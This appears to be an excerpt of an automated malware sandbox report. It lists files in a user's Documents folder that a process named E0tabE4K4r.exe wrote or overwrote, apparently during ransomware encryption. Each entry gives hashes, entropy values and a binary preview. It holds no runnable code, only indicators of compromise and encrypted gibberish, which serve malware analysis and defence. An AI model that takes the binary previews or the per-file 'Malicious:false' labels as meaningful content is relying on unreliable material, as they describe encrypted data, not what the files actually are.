                                                                                                                                                  Preview:JPEAFL......s.=.Sh.-..T.....z...-..NQD.<*..".I.l..../f..c.X.L....LK.<..Ug|..MG.\.....q..7.Kp...5JiE.:....c4...\.]...n..I.j......H.....(.5f.A./...r...(.....l7...V.v...V"w.h....iw...'.y...J...5&.)m.=.-..e..0.r.P6I..jn6.IM\.K.6&........b.z....uAs.Z;.r..j..}...D...v....*&.Em...:\S....A.K.........-2_..:.....q8..I@...4.".:......H..&n.9.#,.R..KP[.Q...<-...l....|+yW.T<).#.$:_u...#..#...].6V..A....j...=.D*....MY.Y..e7.S^...]...+..=.)3P'. q.F.).;.....s]..}.vz....oP+?........!./...,Z.H9#V.\.%..._w;x{......p...r..l/(...>...~.U 1..x.@..h.#.a%....?.._...>...).b.......e.C.^.1C-e...u.S.......`wV..7.Dz..;...BM.}.y.>...].....2.R......CdB.-C/.^..(`F...... ;..........9o.B..K..{}.......w..$...,.C.M.4.#...J.dfFI+~.T..j..Y.....g...By...\v..67..;...c6eB.+.5..N.....7T.m.....^. ......................(...../C....Z`.4.=I...6.L..`..P..C`.......9<.j..|.....\...i.....C.)......:...K>.-..{k.{E...+.m(o...".b.jz]*.f.....@.#HtGr...I. ..^....M.#....emR....e..%.k&F"...a....B...

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\JPEAFKFPZY.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.855808543347058
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pfb6YzfHCDhg1WYfhpiTFqmEIcSIxgAiC+Cj2weoRysgiMtFilVaV2bD:puY7HCFAZeAIc9xgJC9QoRyriMtF8VbD
                                                                                                                                                  MD5:A5ECF1C1EFE01946B0D9B664E53C986D
                                                                                                                                                  SHA1:93B28461DA74C6ABA222750E376494F591CED70D
                                                                                                                                                  SHA-256:23E6D06DB423EC77158054F1D5EC8DE34F46E5A776E76212BB5B5C47DE0AE9E4
                                                                                                                                                  SHA-512:F0DA5A650527BB0A80A9F282D3B8E057CE7840E50F26367A7B377FD3C3E116B363C0DFFD224E9787C8CA9AA4B1B67C6B6DB27BB7C31C7CD6F487A80489ABF707
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JPEAFL......s.=.Sh.-..T.....z...-..NQD.<*..".I.l..../f..c.X.L....LK.<..Ug|..MG.\.....q..7.Kp...5JiE.:....c4...\.]...n..I.j......H.....(.5f.A./...r...(.....l7...V.v...V"w.h....iw...'.y...J...5&.)m.=.-..e..0.r.P6I..jn6.IM\.K.6&........b.z....uAs.Z;.r..j..}...D...v....*&.Em...:\S....A.K.........-2_..:.....q8..I@...4.".:......H..&n.9.#,.R..KP[.Q...<-...l....|+yW.T<).#.$:_u...#..#...].6V..A....j...=.D*....MY.Y..e7.S^...]...+..=.)3P'. q.F.).;.....s]..}.vz....oP+?........!./...,Z.H9#V.\.%..._w;x{......p...r..l/(...>...~.U 1..x.@..h.#.a%....?.._...>...).b.......e.C.^.1C-e...u.S.......`wV..7.Dz..;...BM.}.y.>...].....2.R......CdB.-C/.^..(`F...... ;..........9o.B..K..{}.......w..$...,.C.M.4.#...J.dfFI+~.T..j..Y.....g...By...\v..67..;...c6eB.+.5..N.....7T.m.....^. ......................(...../C....Z`.4.=I...6.L..`..P..C`.......9<.j..|.....\...i.....C.)......:...K>.-..{k.{E...+.m(o...".b.jz]*.f.....@.#HtGr...I. ..^....M.#....emR....e..%.k&F"...a....B...

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\UQMPCTZARJ.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.853522206632691
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Z/rhnSjWLot66UEspeqGzxEhn2DWKZU850Y9uImPKSA/ioYJtE+iqM2bD:vnSjWLoQ6UVEdIkHZfKY9mPKSACfD
                                                                                                                                                  MD5:18FCFD6827913E36AF240CB918EF4BBC
                                                                                                                                                  SHA1:589E0F9B4246A867F76EBF89499424D69AA20596
                                                                                                                                                  SHA-256:2F6C6F273548AA2F49B9DB3F85D5327BB2201ACE927C1F957AC41807A20EBEE7
                                                                                                                                                  SHA-512:A0159D3C3E5065578A4CE84F74214BC614E53618007B4282876667FD4B80755AD412AC4585E43F0BBE38A26E9B2D0545AE1FED3AB4FC5A56121D835F9F65EB80
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UQMPC~nWi3y9.66.."...d...e...$A1.x9..lT.t..R..tJ"X...|.........Ku}a......YJ4p.p..G...5-...!.Y..U.......e....(..D...{0...V"CI.-_...r...)=..#.w12...gUkZ..../..3....%!W.......m@.1.'.4....)Y...}....$..H..I.01.....[{g}6|;..rt)N9..w......$.sC...Xy..W-.w.T$G....1q....#..P..k..K.uz.N.Te.....\...}...gln.)V..X>x`..|.]..X.X$..".R......#1..4...j.s.....Q,GQ......h.b &........b@.r..&N.8.!..-.PYH#Wm@....6.1...+...hO^.;...S..`..@6..f.....&e.X.=...)..K.'.7..z.I.a..%...e.Q.................#Z.......IU`.`......[0.?.g.k..9u....6....._..U6.=....~.H.1n#.pC..y...Q.....;e...@...9..I.[.......c...F4.".....9....P1..:2.N...jb0.G4....f..f.m...iC..7..@.............;......G..b../E>Cf.4%vE/>j..U..bl5........-.;U..y .T..g..(...9.f.&....L..`.W...x(....Has.....jg....qj.~..j..)8"$..S.DD>.X(L.zU..2.Z...L91c.l..w..f..u.E.=...y...]FN.#. ...\"TF..|..W....FG..]F.s...YO..n.?...7s..3. ... ...\[qM.(.....|..Z..S...X.q.<........S-7V.s.R|....j.....z}./......K.VO.d..f.TF...V..{..2U.......{-Y5

                                                                                                                                                  C:\Users\user\Documents\JPEAFKFPZY\UQMPCTZARJ.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.853522206632691
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Z/rhnSjWLot66UEspeqGzxEhn2DWKZU850Y9uImPKSA/ioYJtE+iqM2bD:vnSjWLoQ6UVEdIkHZfKY9mPKSACfD
                                                                                                                                                  MD5:18FCFD6827913E36AF240CB918EF4BBC
                                                                                                                                                  SHA1:589E0F9B4246A867F76EBF89499424D69AA20596
                                                                                                                                                  SHA-256:2F6C6F273548AA2F49B9DB3F85D5327BB2201ACE927C1F957AC41807A20EBEE7
                                                                                                                                                  SHA-512:A0159D3C3E5065578A4CE84F74214BC614E53618007B4282876667FD4B80755AD412AC4585E43F0BBE38A26E9B2D0545AE1FED3AB4FC5A56121D835F9F65EB80
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UQMPC~nWi3y9.66.."...d...e...$A1.x9..lT.t..R..tJ"X...|.........Ku}a......YJ4p.p..G...5-...!.Y..U.......e....(..D...{0...V"CI.-_...r...)=..#.w12...gUkZ..../..3....%!W.......m@.1.'.4....)Y...}....$..H..I.01.....[{g}6|;..rt)N9..w......$.sC...Xy..W-.w.T$G....1q....#..P..k..K.uz.N.Te.....\...}...gln.)V..X>x`..|.]..X.X$..".R......#1..4...j.s.....Q,GQ......h.b &........b@.r..&N.8.!..-.PYH#Wm@....6.1...+...hO^.;...S..`..@6..f.....&e.X.=...)..K.'.7..z.I.a..%...e.Q.................#Z.......IU`.`......[0.?.g.k..9u....6....._..U6.=....~.H.1n#.pC..y...Q.....;e...@...9..I.[.......c...F4.".....9....P1..:2.N...jb0.G4....f..f.m...iC..7..@.............;......G..b../E>Cf.4%vE/>j..U..bl5........-.;U..y .T..g..(...9.f.&....L..`.W...x(....Has.....jg....qj.~..j..)8"$..S.DD>.X(L.zU..2.Z...L91c.l..w..f..u.E.=...y...]FN.#. ...\"TF..|..W....FG..]F.s...YO..n.?...7s..3. ... ...\[qM.(.....|..Z..S...X.q.<........S-7V.s.R|....j.....z}./......K.VO.d..f.TF...V..{..2U.......{-Y5

                                                                                                                                                  C:\Users\user\Documents\MQAWXUYAIK.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.862518077611305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wb8NloEkTvVEX/6+d18FVaCSCXqZHF0391inbwXVaV/8tmU4gT2bD:wwfeEl8L1SPHAbiEFaV/8tmPHD
                                                                                                                                                  MD5:813D765950F9BE3DEC1C7206A4116069
                                                                                                                                                  SHA1:C92BF762232072A03D4E1C63F131F7F94E1D83AC
                                                                                                                                                  SHA-256:129E6B4482CAE2E227740D9604EE954B2FC8F6F3029F50D230E00FE8DBECB83D
                                                                                                                                                  SHA-512:E0AA984F8173B9F977EB35046BF81280AFF9806BB9DD80C34DCCCD679FEA5CE16A72E66FDDB9A6193767E95E92D195B97D80F3160ED63C972D6E7D019BCD9316
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX@q..+2w..4..5..%..*..~........%!..Krrg.....lv.....)...g..s.];...P....I.H.t^y....2.P.GF........wM.SC...i.>_..l.O...Bj...n.V*.*......m.....I.+Bv.......N..v..#.7Vp..D..1...J..|.s{.,...OX.o.o.>...!..k......&...b..Pj.Y.W.n..2..u7(...jI..8.o....Gb..`...h...|..m....(.x8Q..Iw.._v7U..<...3...S[..0H.6.....#...6Y.@$E..B....P\.-...{~.e..F.B...~.r.X.s.\..{DkqA...Ke../......,.......B.u.%.,....*e...C..........*NVC...t..`.$..%..m....d..'..1....A..ZG.}.u~..@.....r..Y...p..0...x]r.0=eBm...g}...|Lv..[I..9.'.[....^He.."....r!{..v.9..k...G..4~Fa7....3Tj./S..?..`,._....+.V.ZF.4.c[m...5....t.K.'6.?..@T..A.K...rg5!V.Z.2..4+u.G.V..n.....7wO.}>^.b}.`....C.Z.....t...}.q........8..Ac.:).....KEVHk......z.,_.~.s8;..iuMa.#..9..A'].g......ml......Gd.n`...-.?..... ..h...K~..r...{..d....z.....Z........g..._..4...e..O..(>nHv.*..|..g.Xn.n...d.qx...oUe.q.Ax.=..i..Ta...5.B.w..q.d?.....r..}.=.\.G.[.*L...Mn..5.....@....q.Q'....#.]i.+'...h......h...........s..~#.,...i.U.Fm.7?

                                                                                                                                                  C:\Users\user\Documents\MQAWXUYAIK.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.862518077611305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wb8NloEkTvVEX/6+d18FVaCSCXqZHF0391inbwXVaV/8tmU4gT2bD:wwfeEl8L1SPHAbiEFaV/8tmPHD
                                                                                                                                                  MD5:813D765950F9BE3DEC1C7206A4116069
                                                                                                                                                  SHA1:C92BF762232072A03D4E1C63F131F7F94E1D83AC
                                                                                                                                                  SHA-256:129E6B4482CAE2E227740D9604EE954B2FC8F6F3029F50D230E00FE8DBECB83D
                                                                                                                                                  SHA-512:E0AA984F8173B9F977EB35046BF81280AFF9806BB9DD80C34DCCCD679FEA5CE16A72E66FDDB9A6193767E95E92D195B97D80F3160ED63C972D6E7D019BCD9316
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX@q..+2w..4..5..%..*..~........%!..Krrg.....lv.....)...g..s.];...P....I.H.t^y....2.P.GF........wM.SC...i.>_..l.O...Bj...n.V*.*......m.....I.+Bv.......N..v..#.7Vp..D..1...J..|.s{.,...OX.o.o.>...!..k......&...b..Pj.Y.W.n..2..u7(...jI..8.o....Gb..`...h...|..m....(.x8Q..Iw.._v7U..<...3...S[..0H.6.....#...6Y.@$E..B....P\.-...{~.e..F.B...~.r.X.s.\..{DkqA...Ke../......,.......B.u.%.,....*e...C..........*NVC...t..`.$..%..m....d..'..1....A..ZG.}.u~..@.....r..Y...p..0...x]r.0=eBm...g}...|Lv..[I..9.'.[....^He.."....r!{..v.9..k...G..4~Fa7....3Tj./S..?..`,._....+.V.ZF.4.c[m...5....t.K.'6.?..@T..A.K...rg5!V.Z.2..4+u.G.V..n.....7wO.}>^.b}.`....C.Z.....t...}.q........8..Ac.:).....KEVHk......z.,_.~.s8;..iuMa.#..9..A'].g......ml......Gd.n`...-.?..... ..h...K~..r...{..d....z.....Z........g..._..4...e..O..(>nHv.*..|..g.Xn.n...d.qx...oUe.q.Ax.=..i..Ta...5.B.w..q.d?.....r..}.=.\.G.[.*L...Mn..5.....@....q.Q'....#.]i.+'...h......h...........s..~#.,...i.U.Fm.7?

                                                                                                                                                  C:\Users\user\Documents\MQAWXUYAIK.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.849919547172077
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PTDyZvo5fd0AU5vJTGw5t9dotv0pSqQGfLpq1w29UjXPLFL4m371Fx8nkd2bD:PTD5sAqv5Gw5tjoF0Eq1LpIw48PLFLNo
                                                                                                                                                  MD5:63360AA614EB64450FA70CBEDA62694D
                                                                                                                                                  SHA1:C37BFBBA23CBBB598CDC9266C9C4A6F8E7617DEC
                                                                                                                                                  SHA-256:35B82E624089CB2E02854B58B678498639D8FDC5293E2F66EFFA27869657E0D7
                                                                                                                                                  SHA-512:0908C566E48FCBF6AB9D7D14609E3211EF5053865DAC5B71241AEF668C945664E25A3A3F2721C53A1FDDBE223E434A3862ABD1304F60CEBAC35D551CD2E72E37
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX.....p...s..x.E...x..c(!.H..j=.\*.5.Ir.T-.~].6a.....s(K.....v7.........e.... $......=.*.+.V.W...jmT'..>...Q}..+.KsKM.........?|.m..9rq....X{......UJm.-..m..#.o...".[.........p...5....0c.d.j%...ur:t/..p.....'....b.3x..l.B.....6&.[..f..fh..D....C,.q.rq...9....Cg|.{.j..|y5.{.....0..Ki.l.0.............Z...N.4.+..W3/u.+.Iw-.%#2.CCB3..0.......)k..y.....n....t.s#r..!..!...%6.3L.y...tVA...zQS....`..&..i..!?a9...d.K..e{....@zw^.^S.V.M.va$yljF.{.O_O....e.9{..D4 .....G....}=..a.#G.....+.......O..qy.o..=.,...uv,.......c..&....~I.%.q?d...*}r..A.R3..P;....~.,....u..D-......6.WX.....Y3a.f9..A$J.a...yB..G|.S........*,.+.[.W1...<SbR../.;.Jv{'..G.z...).vNt.+..t.I".v.|.e......$~h.i~x.LPQ..++ .."..'....,......h/.."p}s....._...}.4/.9........1:;'.6..3....2*}U+...:)%....K...d..m...:.Z.|.D.r.].p. .......O.G..QR..........4S.>.K./...@d.........| ...N......@[.Y..."...RI..HK...V..j.f......6".Q.?...zY......^F...Z.G.}w./.....M4$...j.B.e..B(.jUy.v...`s...6..b.}..`T<.K

                                                                                                                                                  C:\Users\user\Documents\MQAWXUYAIK.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.849919547172077
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PTDyZvo5fd0AU5vJTGw5t9dotv0pSqQGfLpq1w29UjXPLFL4m371Fx8nkd2bD:PTD5sAqv5Gw5tjoF0Eq1LpIw48PLFLNo
                                                                                                                                                  MD5:63360AA614EB64450FA70CBEDA62694D
                                                                                                                                                  SHA1:C37BFBBA23CBBB598CDC9266C9C4A6F8E7617DEC
                                                                                                                                                  SHA-256:35B82E624089CB2E02854B58B678498639D8FDC5293E2F66EFFA27869657E0D7
                                                                                                                                                  SHA-512:0908C566E48FCBF6AB9D7D14609E3211EF5053865DAC5B71241AEF668C945664E25A3A3F2721C53A1FDDBE223E434A3862ABD1304F60CEBAC35D551CD2E72E37
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX.....p...s..x.E...x..c(!.H..j=.\*.5.Ir.T-.~].6a.....s(K.....v7.........e.... $......=.*.+.V.W...jmT'..>...Q}..+.KsKM.........?|.m..9rq....X{......UJm.-..m..#.o...".[.........p...5....0c.d.j%...ur:t/..p.....'....b.3x..l.B.....6&.[..f..fh..D....C,.q.rq...9....Cg|.{.j..|y5.{.....0..Ki.l.0.............Z...N.4.+..W3/u.+.Iw-.%#2.CCB3..0.......)k..y.....n....t.s#r..!..!...%6.3L.y...tVA...zQS....`..&..i..!?a9...d.K..e{....@zw^.^S.V.M.va$yljF.{.O_O....e.9{..D4 .....G....}=..a.#G.....+.......O..qy.o..=.,...uv,.......c..&....~I.%.q?d...*}r..A.R3..P;....~.,....u..D-......6.WX.....Y3a.f9..A$J.a...yB..G|.S........*,.+.[.W1...<SbR../.;.Jv{'..G.z...).vNt.+..t.I".v.|.e......$~h.i~x.LPQ..++ .."..'....,......h/.."p}s....._...}.4/.9........1:;'.6..3....2*}U+...:)%....K...d..m...:.Z.|.D.r.].p. .......O.G..QR..........4S.>.K./...@d.........| ...N......@[.Y..."...RI..HK...V..j.f......6".Q.?...zY......^F...Z.G.}w./.....M4$...j.B.e..B(.jUy.v...`s...6..b.}..`T<.K

                                                                                                                                                  C:\Users\user\Documents\QVTVNIBKSD.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.822407241508103
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:uHvmU0k7X2ioYqan4GrQLxcNlmFhsGLEqXAlPDtZL5QLVsD2+c4bKQN2PmQv2bD:u+U0yKan4Gr6o8hsG4qKNQLK2oKQNnD
                                                                                                                                                  MD5:D1E24C24608BA3845AB24FA18FB92F73
                                                                                                                                                  SHA1:D1D35DB4B9C0FBAA5C80D6DDFE99F8B76BA9D035
                                                                                                                                                  SHA-256:98CC15F1F657D53455E816B1DF854F863CC42DB708A34A77BA263649FC4018CE
                                                                                                                                                  SHA-512:37DF40D3A3874F52168E3A0541C6121B9D77CDE0EC75BC3E10542A675DF19A4BD67ED93F86EFC6068F6B5B0BF231C1943BBFFBB4F22B477F337FC255E9E6D6B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVNX0./V...g.S.....E...kS.f......ES.....t=...M.4!.h._7..O.^.......U..3&Dy.:..F.g.A.W.l..?..k:]9.@.R....puV.h.....x.#..md.+I."+....@N...>.....}G..5.......~.g....2.I........p.?$:.D...6XI.Se..B..?4F.Y...s.=......1M..!.R.h..,.@......F..P.Um-...O.9......Y..2.}..^.j!.._.h...jX..W...:.......!.......g...<a.N....K.p!=J4M..y...28\...`.....SF...)..eO...k..5...{k.x._.H..1h.pJ......4;..9.b..1.7.mu.?....Y.0'S'....Zf..l#.B.w.g.A...G......{.Q..$....T...../."M.{.!.6..MS..&+.~.0.p....,E.fCu..LI.E......K.eCD..<4.......h..B.{.{dH........W1.....A.L.(d......h=.I.`@.G..S..\..............M..x....I.."P=.#...c....(Y....U..~h..QpAf%:..k......M.....Jp..}..%..R...bW..e..x.2.................N.Na.w:..K.=..9.1.@+..T..l.}.D4..b.44.E..q.F....Y.j.1.X.^$.1a.r-U.p7.j......1..V!.)..[*!..R..Y.....mr.f...:H..T..4T.....:....#.1.e.!*tf.<.r5`..1..$..PI....}.....e).>..Ml....^T....r.X.%...#..^.9..B....Y.$}..4BCW.[...%.+`$.......,.l..%..m....j.;t..x.....MR.....v.'..w;.z.....~*R......

                                                                                                                                                  C:\Users\user\Documents\QVTVNIBKSD.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.822407241508103
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:uHvmU0k7X2ioYqan4GrQLxcNlmFhsGLEqXAlPDtZL5QLVsD2+c4bKQN2PmQv2bD:u+U0yKan4Gr6o8hsG4qKNQLK2oKQNnD
                                                                                                                                                  MD5:D1E24C24608BA3845AB24FA18FB92F73
                                                                                                                                                  SHA1:D1D35DB4B9C0FBAA5C80D6DDFE99F8B76BA9D035
                                                                                                                                                  SHA-256:98CC15F1F657D53455E816B1DF854F863CC42DB708A34A77BA263649FC4018CE
                                                                                                                                                  SHA-512:37DF40D3A3874F52168E3A0541C6121B9D77CDE0EC75BC3E10542A675DF19A4BD67ED93F86EFC6068F6B5B0BF231C1943BBFFBB4F22B477F337FC255E9E6D6B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVNX0./V...g.S.....E...kS.f......ES.....t=...M.4!.h._7..O.^.......U..3&Dy.:..F.g.A.W.l..?..k:]9.@.R....puV.h.....x.#..md.+I."+....@N...>.....}G..5.......~.g....2.I........p.?$:.D...6XI.Se..B..?4F.Y...s.=......1M..!.R.h..,.@......F..P.Um-...O.9......Y..2.}..^.j!.._.h...jX..W...:.......!.......g...<a.N....K.p!=J4M..y...28\...`.....SF...)..eO...k..5...{k.x._.H..1h.pJ......4;..9.b..1.7.mu.?....Y.0'S'....Zf..l#.B.w.g.A...G......{.Q..$....T...../."M.{.!.6..MS..&+.~.0.p....,E.fCu..LI.E......K.eCD..<4.......h..B.{.{dH........W1.....A.L.(d......h=.I.`@.G..S..\..............M..x....I.."P=.#...c....(Y....U..~h..QpAf%:..k......M.....Jp..}..%..R...bW..e..x.2.................N.Na.w:..K.=..9.1.@+..T..l.}.D4..b.44.E..q.F....Y.j.1.X.^$.1a.r-U.p7.j......1..V!.)..[*!..R..Y.....mr.f...:H..T..4T.....:....#.1.e.!*tf.<.r5`..1..$..PI....}.....e).>..Ml....^T....r.X.%...#..^.9..B....Y.$}..4BCW.[...%.+`$.......,.l..%..m....j.;t..x.....MR.....v.'..w;.z.....~*R......

                                                                                                                                                  C:\Users\user\Documents\TQDGENUHWP.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854546903278243
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Dgv9PvJ4LFiF5wF4pWWkmiD6d6JBJ8bhJARxmllQeeI07lNpjAFM2bD:DO4L4MKGJyhJUmBeI0hIfD
                                                                                                                                                  MD5:0FA8A862EEC9C25E149B7198D5643E32
                                                                                                                                                  SHA1:E29EB58B8D06A8C0ED1F174B7B9623F3E3E8E507
                                                                                                                                                  SHA-256:7C36D0AA030474D42D47C2BCB964B07FDD97D2D9A213229DA8FACDAE365F5E92
                                                                                                                                                  SHA-512:1E5EAA5D8A4A44EDCE45D69FD401900EDDB01A1784505717254F558EB656AE558BC3A6C788B0E0AC919B9154003905DF7E7E6AA217DB146FD8EDCBA90712C4AA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE...EG.O.....|y./.....wT|*.........|2?.^7@.f..K.h.L5.N..P..5.3...{....$[;.i.j..\..8....4..}..$......)/O....omcBu..N..d.;.A+|H...!WZ...omZ...>.tH^..%..I@.'...<.4.Y......ie .O.....S..P.\...b...2d....S...?.Sb.u<>#.}7...ig.*.e..*#...zs.Xj...@.L.....y.T..sgp.y.E...../..^..{sG......a..D..<...XBI....z...zf.(<.K.0.....hbC.)..l......B.0+..!...J..x.<.nw...G6.........U.R..5.c...}.'..:...tK^..F....T*.G.s../.v1...Ij.@.^=e`.q...t....1..uh....o.`...>.2g.(.L2:..$......tV..g..j.+;.%J.>-..c.sz.m:...5.qP.i...L.l..".;..E...)...>Q)`.%Q....2ty.~..L....(]K...JZx...\...j......6>;..D..c.C.F.=?5....G.A..85..cI.......<....L7.....iL...5...+...+{..{I1...*....\..Q.............3..AC.F.].{.d#.I..<..N.v......D<..4g..w.LI..5......7.,y.......lr.<."...w.q.R.}..L..N......X..a.VZ.L..P....L.e.l../l..D........P..u.8..n.. ...s.e.f+....K6...h|..g..ip..\CQ.~.."vZ17,.W.p..^mBq..~x(......t...;M+...uW....Wj.....b..\...4.=.j`....]...+.....y.E.Gd.q.......0S..."....F..%....oB..U.ct.A.....X

                                                                                                                                                  C:\Users\user\Documents\TQDGENUHWP.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854546903278243
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Dgv9PvJ4LFiF5wF4pWWkmiD6d6JBJ8bhJARxmllQeeI07lNpjAFM2bD:DO4L4MKGJyhJUmBeI0hIfD
                                                                                                                                                  MD5:0FA8A862EEC9C25E149B7198D5643E32
                                                                                                                                                  SHA1:E29EB58B8D06A8C0ED1F174B7B9623F3E3E8E507
                                                                                                                                                  SHA-256:7C36D0AA030474D42D47C2BCB964B07FDD97D2D9A213229DA8FACDAE365F5E92
                                                                                                                                                  SHA-512:1E5EAA5D8A4A44EDCE45D69FD401900EDDB01A1784505717254F558EB656AE558BC3A6C788B0E0AC919B9154003905DF7E7E6AA217DB146FD8EDCBA90712C4AA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE...EG.O.....|y./.....wT|*.........|2?.^7@.f..K.h.L5.N..P..5.3...{....$[;.i.j..\..8....4..}..$......)/O....omcBu..N..d.;.A+|H...!WZ...omZ...>.tH^..%..I@.'...<.4.Y......ie .O.....S..P.\...b...2d....S...?.Sb.u<>#.}7...ig.*.e..*#...zs.Xj...@.L.....y.T..sgp.y.E...../..^..{sG......a..D..<...XBI....z...zf.(<.K.0.....hbC.)..l......B.0+..!...J..x.<.nw...G6.........U.R..5.c...}.'..:...tK^..F....T*.G.s../.v1...Ij.@.^=e`.q...t....1..uh....o.`...>.2g.(.L2:..$......tV..g..j.+;.%J.>-..c.sz.m:...5.qP.i...L.l..".;..E...)...>Q)`.%Q....2ty.~..L....(]K...JZx...\...j......6>;..D..c.C.F.=?5....G.A..85..cI.......<....L7.....iL...5...+...+{..{I1...*....\..Q.............3..AC.F.].{.d#.I..<..N.v......D<..4g..w.LI..5......7.,y.......lr.<."...w.q.R.}..L..N......X..a.VZ.L..P....L.e.l../l..D........P..u.8..n.. ...s.e.f+....K6...h|..g..ip..\CQ.~.."vZ17,.W.p..^mBq..~x(......t...;M+...uW....Wj.....b..\...4.=.j`....]...+.....y.E.Gd.q.......0S..."....F..%....oB..U.ct.A.....X

                                                                                                                                                  C:\Users\user\Documents\TTCBKWZYOC\DTBZGIOOSO.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.871833998084098
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gsX6ePHVBLZEvi0Lw743aL3OHJdXmsF0mD+KYDXsVC9JJWkcbbFVF13iYjVW6hqr:gsXJVBFyi0LFKLYrXxF/+HD8VC9Jskc+
                                                                                                                                                  MD5:38BD100AB4F16909DC0E79C71996164E
                                                                                                                                                  SHA1:417C8D68FCD159043BF2CAF665502F102FFAD7EF
                                                                                                                                                  SHA-256:503BD5EF91DB3C448A487BBDE98587849C87F3742CA3F3C1C09FFF84A7CB9911
                                                                                                                                                  SHA-512:B073A0DED5AF049CDC715B84E170711A638917D96498E84CC45C188DB25F8CCAD69995251438C2634BFAFCC12B9027DC60DF6CB061EA75663744B45E62D4403F
                                                                                                                                                  Malicious:false
